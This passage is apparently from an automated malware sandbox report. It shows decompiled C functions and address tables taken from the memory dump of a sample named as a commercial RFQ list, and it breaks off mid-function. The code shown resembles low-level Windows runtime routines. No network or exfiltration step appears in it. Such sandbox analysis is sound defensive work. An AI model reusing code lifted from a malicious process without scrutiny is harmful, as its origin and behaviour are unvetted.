                                                                                                                                                                                  0x333afc61
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333afc67
                                                                                                                                                                                  0x333afc67
                                                                                                                                                                                  0x333afc69
                                                                                                                                                                                  0x333afc6c
                                                                                                                                                                                  0x333afc6f
                                                                                                                                                                                  0x333afc71
                                                                                                                                                                                  0x333afc78
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333afc78
                                                                                                                                                                                  0x333afc61
                                                                                                                                                                                  0x33352588
                                                                                                                                                                                  0x3335258c
                                                                                                                                                                                  0x33352591
                                                                                                                                                                                  0x33352595
                                                                                                                                                                                  0x33352598
                                                                                                                                                                                  0x3335259a
                                                                                                                                                                                  0x333525a0
                                                                                                                                                                                  0x33352695
                                                                                                                                                                                  0x33352697
                                                                                                                                                                                  0x33352698
                                                                                                                                                                                  0x3335269a
                                                                                                                                                                                  0x3335269b
                                                                                                                                                                                  0x3335269c
                                                                                                                                                                                  0x3335269d
                                                                                                                                                                                  0x3335269e
                                                                                                                                                                                  0x3335269f
                                                                                                                                                                                  0x333526a5
                                                                                                                                                                                  0x333526a6
                                                                                                                                                                                  0x333526a7
                                                                                                                                                                                  0x333526aa
                                                                                                                                                                                  0x333526ab
                                                                                                                                                                                  0x333526ad
                                                                                                                                                                                  0x333526b9
                                                                                                                                                                                  0x333526bc
                                                                                                                                                                                  0x333526bf
                                                                                                                                                                                  0x333526c1
                                                                                                                                                                                  0x333526c4
                                                                                                                                                                                  0x333526cb
                                                                                                                                                                                  0x333526cd
                                                                                                                                                                                  0x333526cf
                                                                                                                                                                                  0x333526cf
                                                                                                                                                                                  0x333526d1
                                                                                                                                                                                  0x333526d3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333526d5
                                                                                                                                                                                  0x333526d8
                                                                                                                                                                                  0x333526da
                                                                                                                                                                                  0x333526dc
                                                                                                                                                                                  0x333526e0
                                                                                                                                                                                  0x333526e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333526e4
                                                                                                                                                                                  0x333526e4
                                                                                                                                                                                  0x333526eb
                                                                                                                                                                                  0x333afc96
                                                                                                                                                                                  0x333afcb3
                                                                                                                                                                                  0x333afcb3
                                                                                                                                                                                  0x333526f1
                                                                                                                                                                                  0x333526f3
                                                                                                                                                                                  0x333526f5
                                                                                                                                                                                  0x333526fc
                                                                                                                                                                                  0x333526fe
                                                                                                                                                                                  0x3335270b
                                                                                                                                                                                  0x33352700
                                                                                                                                                                                  0x33352700
                                                                                                                                                                                  0x33352700
                                                                                                                                                                                  0x333526fe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333526f3
                                                                                                                                                                                  0x33352707
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33352707
                                                                                                                                                                                  0x333526cd
                                                                                                                                                                                  0x333526c4
                                                                                                                                                                                  0x333526bf
                                                                                                                                                                                  0x333526af
                                                                                                                                                                                  0x333526b3
                                                                                                                                                                                  0x333525ae
                                                                                                                                                                                  0x333525ae
                                                                                                                                                                                  0x333525b0
                                                                                                                                                                                  0x333525b3
                                                                                                                                                                                  0x333525b6
                                                                                                                                                                                  0x333525b8
                                                                                                                                                                                  0x333525bf
                                                                                                                                                                                  0x333525c4
                                                                                                                                                                                  0x333525c7
                                                                                                                                                                                  0x333525cd
                                                                                                                                                                                  0x33352661
                                                                                                                                                                                  0x33352667
                                                                                                                                                                                  0x33352678
                                                                                                                                                                                  0x3335267c
                                                                                                                                                                                  0x3335267c
                                                                                                                                                                                  0x3335267d
                                                                                                                                                                                  0x333afc33
                                                                                                                                                                                  0x333afc33
                                                                                                                                                                                  0x33352669
                                                                                                                                                                                  0x33352669
                                                                                                                                                                                  0x3335266e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335266e
                                                                                                                                                                                  0x333525d3
                                                                                                                                                                                  0x333525d3
                                                                                                                                                                                  0x333525d8
                                                                                                                                                                                  0x333525dd
                                                                                                                                                                                  0x333525dd
                                                                                                                                                                                  0x333525dd
                                                                                                                                                                                  0x333525e2
                                                                                                                                                                                  0x333525e2
                                                                                                                                                                                  0x333525e7
                                                                                                                                                                                  0x33352607
                                                                                                                                                                                  0x3335260f
                                                                                                                                                                                  0x33352615
                                                                                                                                                                                  0x33352618
                                                                                                                                                                                  0x33352621
                                                                                                                                                                                  0x33352630
                                                                                                                                                                                  0x33352636
                                                                                                                                                                                  0x3335263e
                                                                                                                                                                                  0x3335263e
                                                                                                                                                                                  0x333525ec
                                                                                                                                                                                  0x333525f8
                                                                                                                                                                                  0x333525f8
                                                                                                                                                                                  0x333525a0

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 1384c65eb1b2ef8ea88857ee011311acf5215e3ba2d02dec431a7faaafc51404
                                                                                                                                                                                  • Instruction ID: f60aa2bfc753b5de2cdd046cc37f7260b8cae7383d692eb040c8946257abe748
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1384c65eb1b2ef8ea88857ee011311acf5215e3ba2d02dec431a7faaafc51404
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41BCB194A704CFE710DF24CD80A49B7F5FF84354F18C6AAE446DB6A0DB30AA41CB41
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33354779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                                  			E33354779(signed int __eax, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v0;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t67;
				signed int _t69;
				void* _t73;
				intOrPtr _t74;
				signed int _t76;
				signed int _t79;
				void* _t80;
				intOrPtr* _t84;
				signed int _t88;
				intOrPtr* _t93;
				intOrPtr _t96;
				signed int _t98;
				intOrPtr* _t100;
				void* _t102;

				_t88 = __edx;
				_t55 = __eax;
				_push(_t73);
				_t100 = __edx;
				if((_a4 & 0x00000001) == 0) {
					L17:
					if((_a4 & 0x00000002) != 0) {
						_t93 = _t100 + 8;
						_t74 = 8;
						do {
							__eflags =  *_t93;
							if( *_t93 != 0) {
								E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t93);
							}
							_t93 = _t93 + 4;
							_t74 = _t74 - 1;
							__eflags = _t74;
						} while (_t74 != 0);
						_t55 = E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t74, _t100);
					}
					return _t55;
				} else {
					_t79 =  *0x334466fc; // 0x5
					_v12 = _t79;
					if(_t79 >= 1) {
						_t98 = 0x11;
						do {
							asm("bsr eax, edi");
							_t88 = _t98;
							asm("btc edx, eax");
							_v20 = _t88;
							_t55 =  *(_t100 + _t55 * 4 - 8);
							_v16 = _t55;
							if(_t55 != 0) {
								_t55 = _t55 + _t88 * 4 + 4;
								if(_t55 != 0 &&  *_t55 != 0) {
									asm("bsr eax, edi");
									_t85 = _t98;
									asm("btc ecx, eax");
									_t67 =  *((intOrPtr*)(0x334466c4 + _t55 * 4));
									if(_t67 == 0) {
										_t73 = 0;
									} else {
										_t73 = 4 + _t85 * 8 + _t67;
									}
									L333553C0(_t73);
									_t69 =  *((intOrPtr*)(_t73 + 4));
									_v12 = _t69;
									if(_t69 != 0 && _t69 != 0xffffffff) {
										_t88 = _v16;
										_t85 =  *(_t88 + 4 + _v20 * 4);
										if(_t85 != 0) {
											 *0x334491e0(_t85);
											_v8();
											_t72 = _v24;
											 *(_v20 + 4 + _t72 * 4) =  *(_v20 + 4 + _v24 * 4) & 0x00000000;
										}
									}
									_t55 = E333552F0(_t85, _t73);
									_t79 = _v16;
								}
							}
							_t98 = _t98 + 1;
							_t79 = _t79 - 1;
							_v12 = _t79;
						} while (_t79 != 0);
					}
					L33362330(_t55, 0x334466d0);
					_t60 =  *_t100;
					if( *((intOrPtr*)(_t60 + 4)) != _t100) {
						L24:
						_t80 = 3;
						asm("int 0x29");
						_push(_t80);
						_push(_t73);
						_push(_t100);
						_push(0x334466d0);
						_t96 = _v28;
						_t76 = _t88;
						_t102 = _t80;
						__eflags = _t96;
						if(__eflags != 0) {
							_t61 =  *((intOrPtr*)(_t96 + 0x1c));
						} else {
							_t61 = 0;
							__eflags = 0;
						}
						_push(_a12);
						_push(_a8);
						_push(_t61);
						_push(_t96);
						_t62 = E3335496B(_t76, _t80, _t96, _t102, __eflags);
						__eflags = _t62;
						if(_t62 >= 0) {
							E3335491F( *((intOrPtr*)(_t102 + 0x5c)), 1);
							 *(_t102 + 0x90) =  *(_t102 + 0x90) & 0x00000000;
							 *(_t102 + 0xdd) = _t76;
							__eflags = _t96;
							if(_t96 != 0) {
								 *((intOrPtr*)(_t102 + 0x10)) =  *((intOrPtr*)(_t96 + 0x18));
							}
							__eflags =  *((intOrPtr*)(_t102 + 8));
							if(__eflags != 0) {
								E333873B3(_t76, _t102, _t96, _t102, __eflags);
							}
							_t62 = 0;
							__eflags = 0;
						}
						return _t62;
					} else {
						_t84 =  *((intOrPtr*)(_t100 + 4));
						if( *_t84 != _t100) {
							goto L24;
						} else {
							 *_t84 = _t60;
							 *((intOrPtr*)(_t60 + 4)) = _t84;
							_t55 = E333624D0(0x334466d0);
							goto L17;
						}
					}
				}
			}
































                                                                                                                                                                                  0x33354779
                                                                                                                                                                                  0x33354779
                                                                                                                                                                                  0x33354788
                                                                                                                                                                                  0x3335478b
                                                                                                                                                                                  0x3335478d
                                                                                                                                                                                  0x3335486a
                                                                                                                                                                                  0x3335486e
                                                                                                                                                                                  0x3335487b
                                                                                                                                                                                  0x3335487e
                                                                                                                                                                                  0x3335487f
                                                                                                                                                                                  0x3335487f
                                                                                                                                                                                  0x33354882
                                                                                                                                                                                  0x333548ab
                                                                                                                                                                                  0x333548ab
                                                                                                                                                                                  0x33354884
                                                                                                                                                                                  0x33354887
                                                                                                                                                                                  0x33354887
                                                                                                                                                                                  0x33354887
                                                                                                                                                                                  0x33354897
                                                                                                                                                                                  0x33354897
                                                                                                                                                                                  0x33354876
                                                                                                                                                                                  0x33354793
                                                                                                                                                                                  0x33354793
                                                                                                                                                                                  0x33354799
                                                                                                                                                                                  0x333547a0
                                                                                                                                                                                  0x333547a8
                                                                                                                                                                                  0x333547a9
                                                                                                                                                                                  0x333547a9
                                                                                                                                                                                  0x333547ac
                                                                                                                                                                                  0x333547ae
                                                                                                                                                                                  0x333547b1
                                                                                                                                                                                  0x333547b5
                                                                                                                                                                                  0x333547b9
                                                                                                                                                                                  0x333547bf
                                                                                                                                                                                  0x333547c4
                                                                                                                                                                                  0x333547c7
                                                                                                                                                                                  0x333547ce
                                                                                                                                                                                  0x333547d1
                                                                                                                                                                                  0x333547d3
                                                                                                                                                                                  0x333547d6
                                                                                                                                                                                  0x333547df
                                                                                                                                                                                  0x333b0144
                                                                                                                                                                                  0x333547e5
                                                                                                                                                                                  0x333547ec
                                                                                                                                                                                  0x333547ec
                                                                                                                                                                                  0x333547ef
                                                                                                                                                                                  0x333547f4
                                                                                                                                                                                  0x333547f7
                                                                                                                                                                                  0x333547fd
                                                                                                                                                                                  0x33354808
                                                                                                                                                                                  0x3335480c
                                                                                                                                                                                  0x33354812
                                                                                                                                                                                  0x33354817
                                                                                                                                                                                  0x3335481d
                                                                                                                                                                                  0x33354821
                                                                                                                                                                                  0x33354829
                                                                                                                                                                                  0x33354829
                                                                                                                                                                                  0x33354812
                                                                                                                                                                                  0x3335482f
                                                                                                                                                                                  0x33354834
                                                                                                                                                                                  0x33354834
                                                                                                                                                                                  0x333547c7
                                                                                                                                                                                  0x33354838
                                                                                                                                                                                  0x33354839
                                                                                                                                                                                  0x3335483c
                                                                                                                                                                                  0x3335483c
                                                                                                                                                                                  0x333547a9
                                                                                                                                                                                  0x3335484c
                                                                                                                                                                                  0x33354851
                                                                                                                                                                                  0x33354856
                                                                                                                                                                                  0x333548b2
                                                                                                                                                                                  0x333548b4
                                                                                                                                                                                  0x333548b5
                                                                                                                                                                                  0x333548bc
                                                                                                                                                                                  0x333548bd
                                                                                                                                                                                  0x333548be
                                                                                                                                                                                  0x333548bf
                                                                                                                                                                                  0x333548c0
                                                                                                                                                                                  0x333548c3
                                                                                                                                                                                  0x333548c5
                                                                                                                                                                                  0x333548c7
                                                                                                                                                                                  0x333548c9
                                                                                                                                                                                  0x3335491a
                                                                                                                                                                                  0x333548cb
                                                                                                                                                                                  0x333548cb
                                                                                                                                                                                  0x333548cb
                                                                                                                                                                                  0x333548cb
                                                                                                                                                                                  0x333548cd
                                                                                                                                                                                  0x333548d3
                                                                                                                                                                                  0x333548d6
                                                                                                                                                                                  0x333548d7
                                                                                                                                                                                  0x333548d8
                                                                                                                                                                                  0x333548dd
                                                                                                                                                                                  0x333548df
                                                                                                                                                                                  0x333548e7
                                                                                                                                                                                  0x333548ec
                                                                                                                                                                                  0x333548f3
                                                                                                                                                                                  0x333548f9
                                                                                                                                                                                  0x333548fb
                                                                                                                                                                                  0x33354900
                                                                                                                                                                                  0x33354900
                                                                                                                                                                                  0x33354903
                                                                                                                                                                                  0x33354907
                                                                                                                                                                                  0x3335490b
                                                                                                                                                                                  0x3335490b
                                                                                                                                                                                  0x33354910
                                                                                                                                                                                  0x33354910
                                                                                                                                                                                  0x33354910
                                                                                                                                                                                  0x33354917
                                                                                                                                                                                  0x33354858
                                                                                                                                                                                  0x33354858
                                                                                                                                                                                  0x3335485d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335485f
                                                                                                                                                                                  0x3335485f
                                                                                                                                                                                  0x33354862
                                                                                                                                                                                  0x33354865
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33354865
                                                                                                                                                                                  0x3335485d
                                                                                                                                                                                  0x33354856

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: fd4bfbda11cf7091309094a9c8f057093648a61c51e06c639a08755b2862aff2
                                                                                                                                                                                  • Instruction ID: 6b6702eac4f3628d5cc8a82f880dada6f2131e1ec22fb02376334da8390dbee9
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd4bfbda11cf7091309094a9c8f057093648a61c51e06c639a08755b2862aff2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B41ADB4A443418FE719CF2ADC94F2AB7E9AF81355F14842DF945872A0DB36E881CA91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333556E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                  			E333556E0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v36;
				void* _v60;
				void* _t32;
				char* _t35;
				void* _t37;
				char* _t41;
				char* _t52;
				intOrPtr _t60;
				void* _t70;
				signed int _t76;
				signed int _t77;

				_t77 = _t76 & 0xfffffff8;
				_push(__ecx);
				_t73 = _a8;
				_t70 = _a8 - 0x78;
				_t32 = L33363C40();
				_t52 = 0x7ffe0386;
				if(_t32 != 0) {
					_t35 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t35 = 0x7ffe0386;
				}
				if( *_t35 != 0) {
					E33424B67( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
				}
				_t37 = E33357072(_a4, _t70, 0);
				if(_t37 != 0) {
					if(L33363C40() != 0) {
						_t41 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t41 = _t52;
					}
					if( *_t41 != 0) {
						L33424C59( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					E33356F4C(_t77 + 0x10,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					_t60 = _a4;
					 *((intOrPtr*)(_t60 + 0x30)) =  *((intOrPtr*)(_t70 + 0x30));
					 *((intOrPtr*)(_t60 + 0x34)) =  *((intOrPtr*)(_t70 + 0x34));
					 *0x334491e0(_t60,  *((intOrPtr*)(_t70 + 0x34)), _t70);
					 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0x30))))();
					if(L33363C40() != 0) {
						_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t52 != 0) {
						L33424CD2( *((intOrPtr*)(_t70 + 0x5c)), _a8,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					_t37 = E33356ECF( *((intOrPtr*)(_t77 + 0xc)));
				}
				return _t37;
			}














                                                                                                                                                                                  0x333556e5
                                                                                                                                                                                  0x333556e8
                                                                                                                                                                                  0x333556eb
                                                                                                                                                                                  0x333556ef
                                                                                                                                                                                  0x333556f2
                                                                                                                                                                                  0x333556f7
                                                                                                                                                                                  0x333556fe
                                                                                                                                                                                  0x333b06a1
                                                                                                                                                                                  0x33355704
                                                                                                                                                                                  0x33355704
                                                                                                                                                                                  0x33355704
                                                                                                                                                                                  0x33355709
                                                                                                                                                                                  0x333b06b9
                                                                                                                                                                                  0x333b06b9
                                                                                                                                                                                  0x33355716
                                                                                                                                                                                  0x3335571d
                                                                                                                                                                                  0x33355726
                                                                                                                                                                                  0x333b06cc
                                                                                                                                                                                  0x3335572c
                                                                                                                                                                                  0x3335572c
                                                                                                                                                                                  0x3335572c
                                                                                                                                                                                  0x33355731
                                                                                                                                                                                  0x333b06e4
                                                                                                                                                                                  0x333b06e4
                                                                                                                                                                                  0x33355744
                                                                                                                                                                                  0x33355749
                                                                                                                                                                                  0x33355750
                                                                                                                                                                                  0x33355756
                                                                                                                                                                                  0x33355762
                                                                                                                                                                                  0x33355768
                                                                                                                                                                                  0x33355771
                                                                                                                                                                                  0x333b06f7
                                                                                                                                                                                  0x333b06f7
                                                                                                                                                                                  0x3335577a
                                                                                                                                                                                  0x333b0711
                                                                                                                                                                                  0x333b0711
                                                                                                                                                                                  0x33355784
                                                                                                                                                                                  0x33355784
                                                                                                                                                                                  0x3335578f

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 36fda0e1566627dec96aed425ccde41e95bba23fd04a0497af8b39c7f8ae2a95
                                                                                                                                                                                  • Instruction ID: e7eed6793358a69a63f8911d01566a50f68a2a7055ed975c2d57fb4d1ddee653
                                                                                                                                                                                  • Opcode Fuzzy Hash: 36fda0e1566627dec96aed425ccde41e95bba23fd04a0497af8b39c7f8ae2a95
                                                                                                                                                                                  • Instruction Fuzzy Hash: 68315839A15A05AFEB459F24CA80E89BBA9FF84254F449055F84197E61DB35F830CB80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333FE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                  			E333FE750(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				intOrPtr _v24;
				char _v25;
				intOrPtr _v28;
				intOrPtr* _v32;
				char _v33;
				char* _t30;
				intOrPtr* _t33;
				void* _t37;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t46;
				char* _t49;
				char _t51;
				char* _t53;
				intOrPtr* _t57;
				intOrPtr* _t60;

				_t30 =  &_v12;
				_v24 = __ecx;
				_t60 = __edx;
				_v8 = _t30;
				_t46 = 0;
				_v16 = __edx;
				_v25 = 0;
				_v12 = _t30;
				L33362330(_t30, 0x33446d4c);
				_t57 =  *0x3344379c; // 0x779c379c
				if(_t57 == 0x3344379c) {
					L10:
					E333624D0(0x33446d4c);
					while(1) {
						_t33 = _v12;
						_t49 =  &_v12;
						if(_t33 == _t49) {
							goto L16;
						}
						if( *((intOrPtr*)(_t33 + 4)) != _t49) {
							goto L15;
						} else {
							_t51 =  *_t33;
							if( *((intOrPtr*)(_t51 + 4)) != _t33) {
								goto L15;
							} else {
								_v12 = _t51;
								 *((intOrPtr*)(_t51 + 4)) =  &_v12;
								E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
								continue;
							}
						}
						goto L16;
					}
				} else {
					do {
						_t7 = _t57 + 8; // 0x779c37a4
						_t37 = _t7;
						_t46 = _t57;
						 *_t37 =  *_t37 + 1;
						_v20 = _t37;
						E333624D0(0x33446d4c);
						 *0x334491e0(_v28, _t60);
						if( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0xc))))() != 0) {
							_v33 = 1;
						}
						L33362330(_t40, 0x33446d4c);
						_t42 = _v32;
						_t57 =  *_t57;
						 *_t42 =  *_t42 - 1;
						if( *_t42 != 0) {
							goto L8;
						} else {
							if( *((intOrPtr*)(_t57 + 4)) != _t46) {
								L15:
								_push(3);
								asm("int 0x29");
							} else {
								_t43 =  *((intOrPtr*)(_t46 + 4));
								if( *_t43 != _t46) {
									goto L15;
								} else {
									 *_t43 = _t57;
									_t53 =  &_v20;
									 *((intOrPtr*)(_t57 + 4)) = _t43;
									_t44 = _v16;
									if( *_t44 != _t53) {
										goto L15;
									} else {
										 *_t46 = _t53;
										 *((intOrPtr*)(_t46 + 4)) = _t44;
										 *_t44 = _t46;
										_v16 = _t46;
										goto L8;
									}
								}
							}
						}
						goto L16;
						L8:
						_t60 = _v24;
					} while (_t57 != 0x3344379c);
					_t46 = _v33;
					goto L10;
				}
				L16:
				return _t46;
			}
























                                                                                                                                                                                  0x333fe75e
                                                                                                                                                                                  0x333fe762
                                                                                                                                                                                  0x333fe766
                                                                                                                                                                                  0x333fe768
                                                                                                                                                                                  0x333fe76c
                                                                                                                                                                                  0x333fe76e
                                                                                                                                                                                  0x333fe777
                                                                                                                                                                                  0x333fe77b
                                                                                                                                                                                  0x333fe77f
                                                                                                                                                                                  0x333fe784
                                                                                                                                                                                  0x333fe790
                                                                                                                                                                                  0x333fe80f
                                                                                                                                                                                  0x333fe814
                                                                                                                                                                                  0x333fe819
                                                                                                                                                                                  0x333fe819
                                                                                                                                                                                  0x333fe81d
                                                                                                                                                                                  0x333fe823
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe828
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe82a
                                                                                                                                                                                  0x333fe82a
                                                                                                                                                                                  0x333fe82f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe831
                                                                                                                                                                                  0x333fe83c
                                                                                                                                                                                  0x333fe842
                                                                                                                                                                                  0x333fe848
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe848
                                                                                                                                                                                  0x333fe82f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe828
                                                                                                                                                                                  0x333fe792
                                                                                                                                                                                  0x333fe792
                                                                                                                                                                                  0x333fe792
                                                                                                                                                                                  0x333fe792
                                                                                                                                                                                  0x333fe795
                                                                                                                                                                                  0x333fe797
                                                                                                                                                                                  0x333fe79e
                                                                                                                                                                                  0x333fe7a2
                                                                                                                                                                                  0x333fe7b1
                                                                                                                                                                                  0x333fe7bb
                                                                                                                                                                                  0x333fe7bd
                                                                                                                                                                                  0x333fe7bd
                                                                                                                                                                                  0x333fe7c7
                                                                                                                                                                                  0x333fe7cc
                                                                                                                                                                                  0x333fe7d0
                                                                                                                                                                                  0x333fe7d2
                                                                                                                                                                                  0x333fe7d5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe7d7
                                                                                                                                                                                  0x333fe7da
                                                                                                                                                                                  0x333fe84f
                                                                                                                                                                                  0x333fe84f
                                                                                                                                                                                  0x333fe852
                                                                                                                                                                                  0x333fe7dc
                                                                                                                                                                                  0x333fe7dc
                                                                                                                                                                                  0x333fe7e1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe7e3
                                                                                                                                                                                  0x333fe7e3
                                                                                                                                                                                  0x333fe7e5
                                                                                                                                                                                  0x333fe7e9
                                                                                                                                                                                  0x333fe7ec
                                                                                                                                                                                  0x333fe7f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe7f4
                                                                                                                                                                                  0x333fe7f4
                                                                                                                                                                                  0x333fe7f6
                                                                                                                                                                                  0x333fe7f9
                                                                                                                                                                                  0x333fe7fb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe7fb
                                                                                                                                                                                  0x333fe7f2
                                                                                                                                                                                  0x333fe7e1
                                                                                                                                                                                  0x333fe7da
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe7ff
                                                                                                                                                                                  0x333fe7ff
                                                                                                                                                                                  0x333fe803
                                                                                                                                                                                  0x333fe80b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333fe80b
                                                                                                                                                                                  0x333fe854
                                                                                                                                                                                  0x333fe85c

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 9c6374e4ac064746fad9f390308f130a258711db4ede2568de6dd48c653675e7
                                                                                                                                                                                  • Instruction ID: ed0891b09d9cb80515e5205f5180ce2c08b0e3a3c8cad53a1fbdd1f035f66403
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c6374e4ac064746fad9f390308f130a258711db4ede2568de6dd48c653675e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31ADB590A3018FD700DF18C88084ABBE5FF89658F89C6BEE4889B221D331DD05CF92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33353536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                                  			E33353536(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int* _v8;
				char _v9;
